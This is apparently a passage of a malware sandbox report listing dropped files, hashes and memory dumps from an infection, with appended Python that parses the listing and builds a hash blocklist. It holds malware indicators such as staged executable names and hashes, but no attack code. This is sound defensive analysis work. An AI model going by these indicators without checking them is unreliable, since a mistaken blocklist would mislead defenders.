SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

memory/4052-503-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-509-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1088-510-0x0000000000900000-0x0000000000DBC000-memory.dmp

memory/876-511-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4052-515-0x0000000000400000-0x0000000000429000-memory.dmp

\??\pipe\crashpad_1028_IUVSEGPSSZRZDKYX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4052-546-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108900101\4c885c7af1.exe

MD5 5e86cd25cd046c648667bdc9d733eab0
SHA1 e977e0f0a2bc4e3ace1e03e4ec5d8445de6f7427
SHA256 7195abf578a61a3c099d704d3bdbdc28f170be78bd7dcd5df64e8ffe19dfdc66
SHA512 e63bf66221c67d868c460bf6b51b89291ff6af4e91374cf24e264be469bffd5d94c3b2c14585600d3bc8b770afe429c05379f491a927b0c1b228d57cb521457c

memory/5348-559-0x0000000000880000-0x0000000000B8C000-memory.dmp

memory/652-564-0x0000000000B40000-0x0000000000B45000-memory.dmp

memory/5648-588-0x0000017D5CA50000-0x0000017D5CA6C000-memory.dmp

memory/5648-589-0x0000017D5CA70000-0x0000017D5CA7A000-memory.dmp

memory/5648-590-0x0000017D5CA80000-0x0000017D5CA88000-memory.dmp

memory/5648-591-0x0000017D5CA90000-0x0000017D5CA9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir1028_469609600\ff73f85b-e026-43a4-98d4-db5c310ad53b.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir1028_469609600\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 be9f952c7cc8e57a22348991b36d9fe2
SHA1 5ad124971e5c6d439f584dd7bf50c1ad5637cae0
SHA256 3aafd3eb84d9d818c6ec0f139cea3ec98ff3294944ba009b7a22d45476ca9fb7
SHA512 7c8c72c5994b597a1ce63a3adc92de3dd8044041694d74d28a54dac113a0e3b2c7cab7dc43486ff0fbe259491ad50456473d93f280f24420567755514f7dedd6

memory/4052-989-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-990-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-991-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9f4a0b24e1ad3a25fc9435eb63195e60
SHA1 052b5a37605d7e0e27d8b47bf162a000850196cd
SHA256 7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
SHA512 70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

memory/1088-1003-0x0000000000900000-0x0000000000DBC000-memory.dmp

memory/876-1007-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4d83b8f7-ddcb-4add-81bd-2e772035058c.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4c9b7e612ef21ee665c70534d72524b0
SHA1 e76e22880ffa7d643933bf09544ceb23573d5add
SHA256 a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e
SHA512 e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3ecf746a33d00f5e25716c0bf0f74e64
SHA1 85a16f836f55174363b18825a7d252a945f3f58e
SHA256 4a7f7bdb9036ae691973116952d43d15254262c5b4214f7e7d43dfd2effc42c9
SHA512 6e7ed1e2e1bc5295ee56954f1d2074e0fdea07553e1c4e7a1b415c0dbd41d9644da02b2893a189364a4fba43d9aafcdeaed43ad6e6978312e9ace04d9ad6caf1

memory/5348-1018-0x0000000000880000-0x0000000000B8C000-memory.dmp

memory/4052-1024-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-1025-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-1028-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-1032-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-1033-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4052-1037-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108910101\25225dec3b.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/760-1062-0x0000000000D40000-0x000000000172D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108920101\b7b3518f4b.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/5724-1082-0x00000000003C0000-0x0000000000438000-memory.dmp

memory/5568-1086-0x0000000000900000-0x0000000000DBC000-memory.dmp

memory/5568-1088-0x0000000000900000-0x0000000000DBC000-memory.dmp

memory/760-1091-0x0000000000D40000-0x000000000172D000-memory.dmp

memory/5624-1111-0x000002086DBC0000-0x000002086DBC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108930101\01b3af3054.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/2408-1131-0x0000000000ED0000-0x0000000001B03000-memory.dmp

memory/760-1134-0x0000000000D40000-0x000000000172D000-memory.dmp

C:\ProgramData\hd26p\vs268q

MD5 cc42310c6b79fdea5a1f97dd860bc5c9
SHA1 8c5ae2648ee12ef044471ae7f26b4c814603e36d
SHA256 21f33455cd566ff43d91f43b052bfc39ab962c6c65cd3177ebdad3ad7716e452
SHA512 0953ed6e87fa90b85ae9f575079ab08a41a70253885738d6434e5e62ec2418481aaf0bafe158273488584b364d1acbf05478032c9e2ab9b874aeb15fe2404b33

C:\ProgramData\hd26p\wb1n79

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

memory/1652-1154-0x0000000000610000-0x0000000000CFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108940101\afe4448849.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/6136-1167-0x0000000000F20000-0x00000000013B5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\ProgramData\AD1A987295615D0E.dat

MD5 17c6530503a40284486a7d10c7e87613
SHA1 1fd1dd5c6b5521fada17389e588b69bf3b22fb09
SHA256 6792c7c2010f1e8b04e16db6fdcaa862774a541fede9193d884c3c68e6e984bd
SHA512 b82a10c5be0fecfb4fcd1789f1d86dbe1c47c611fa69ca160ee09a0b66dbdd582fa1674d8d435ef3e03abf196f9669232eb82f7a02552e9414eaf8d56dbf9016

C:\ProgramData\18C6FCFE00EDA716.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\BAA9382368A427E7.dat

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\ProgramData\520DCB33B5D7D632.dat

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/2408-1191-0x0000000000ED0000-0x0000000001B03000-memory.dmp

memory/6136-1207-0x0000000000F20000-0x00000000013B5000-memory.dmp

memory/2408-1211-0x0000000000ED0000-0x0000000001B03000-memory.dmp
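The listing above is the sandbox's raw record of dropped files and process memory dumps. Two things make it awkward to consume as-is: the same region is dumped many times for one PID (the `memory/4052-…-0x400000-0x429000` lines), and several hashed entries are of trivially small content that carries no signal (the crashpad pipe hashes to the empty string, `service[1].htm` to the single byte `0`, `SCT Auditing Pending Reports` to `[]`, the Edge `.tmp` to `.`) and must not end up on a blocklist. The Python below is an added example, not part of the report or of any vendor tooling: it parses this listing format, collapses repeated memory dumps into unique regions per PID, separates the staged payloads in the numbered `Temp\1010xxxx0101\` directories and the `Tasks\*.job` from browser noise, and flags trivial-content hashes by computing them rather than hard-coding them. The sample input is a constructed excerpt of the lines above (SHA512 lines omitted), and the category names are my own.

```python
import hashlib
import re
from dataclasses import dataclass, field

# One memory-dump line per PID/event: memory/<pid>-<event>-0x<start>-0x<end>-memory.dmp
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
# Staging pattern seen in this report (assumption): ...\Temp\<11 digits>\<name>.exe
STAGED_EXE_RE = re.compile(r"\\AppData\\Local\\Temp\\\d{11}\\[^\\]+\.exe$", re.I)
TASK_JOB_RE = re.compile(r"^C:\\Windows\\Tasks\\[^\\]+\.job$", re.I)
BROWSER_RE = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\", re.I)

# SHA256 of contents too small to be an indicator; computed, not hard-coded.
TRIVIAL_CONTENT = {
    hashlib.sha256(data).hexdigest(): label
    for data, label in ((b"", "empty file"), (b"0", 'literal "0"'),
                        (b"[]", 'literal "[]"'), (b".", 'literal "."'))
}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def sha256(self) -> str:
        return self.hashes.get("SHA256", "").lower()


@dataclass(frozen=True)
class MemRegion:
    pid: int
    event: int
    start: int
    end: int


def parse_listing(text: str):
    """Split the sandbox listing into dropped files (with hashes) and memory regions."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := MEM_RE.match(line):
            regions.append(MemRegion(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
        elif (h := HASH_RE.match(line)) and current is not None:
            current.hashes[h[1]] = h[2].lower()
        else:  # anything else starts a new file entry; its hash lines follow
            current = DroppedFile(line)
            files.append(current)
    return files, regions


def classify_path(path: str) -> str:
    if path.startswith("\\??\\pipe\\"):
        return "named_pipe"
    if STAGED_EXE_RE.search(path):
        return "payload_exe"
    if TASK_JOB_RE.match(path):
        return "task_job"
    if path.lower().startswith("c:\\programdata\\"):
        return "programdata_drop"
    if BROWSER_RE.search(path):
        return "browser_artifact"
    return "other"


def trivial_content_label(sha256: str):
    return TRIVIAL_CONTENT.get(sha256.lower())


def summarize_memory(regions):
    """Collapse repeated dumps of one region into a single (start, end, size) per PID."""
    by_pid = {}
    for r in regions:
        by_pid.setdefault(r.pid, set()).add((r.start, r.end))
    return {pid: sorted((s, e, e - s) for s, e in spans) for pid, spans in by_pid.items()}


def ioc_hashes(files):
    """SHA256s worth blocklisting: skip browser noise, pipes and trivial contents."""
    return [f.sha256 for f in files
            if f.sha256 and trivial_content_label(f.sha256) is None
            and classify_path(f.path) not in ("browser_artifact", "named_pipe")]


# Constructed excerpt of the report's listing (SHA512 lines dropped for brevity).
SAMPLE = r"""
memory/4052-353-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe
MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
memory/4052-351-0x0000000000400000-0x0000000000429000-memory.dmp
C:\Windows\Tasks\Test Task17.job
MD5 a1d7d2229943ec9dea7146b749f38813
SHA256 0df85ad6ac0d3c16decae2f92615d42e90d1ca6be9967b787d28f8a2f82b5f5c
\??\pipe\crashpad_1028_IUVSEGPSSZRZDKYX
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\service[1].htm
MD5 cfcd208495d565ef66e7dff9f98764da
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
memory/1088-361-0x0000000000900000-0x0000000000DBC000-memory.dmp
"""

if __name__ == "__main__":
    files, regions = parse_listing(SAMPLE)
    for f in files:
        note = trivial_content_label(f.sha256) or ""
        print(f"{classify_path(f.path):17} {f.sha256[:16]}...  {f.path}  {note}")
    for pid, spans in sorted(summarize_memory(regions).items()):
        print(pid, [f"0x{s:X}-0x{e:X} ({size:#x} bytes)" for s, e, size in spans])
    print("blocklist:", ioc_hashes(files))
```

Run against the full listing, the memory summary gives one line per PID with the distinct regions dumped (a stable 0x29000-byte image at 0x400000 for PID 4052 is a far more useful pivot than a dozen identical dump names), and `ioc_hashes` yields only the staged executables, the Tasks job and the `ProgramData` drops, leaving out Chrome and Edge housekeeping files whose hashes change on every run.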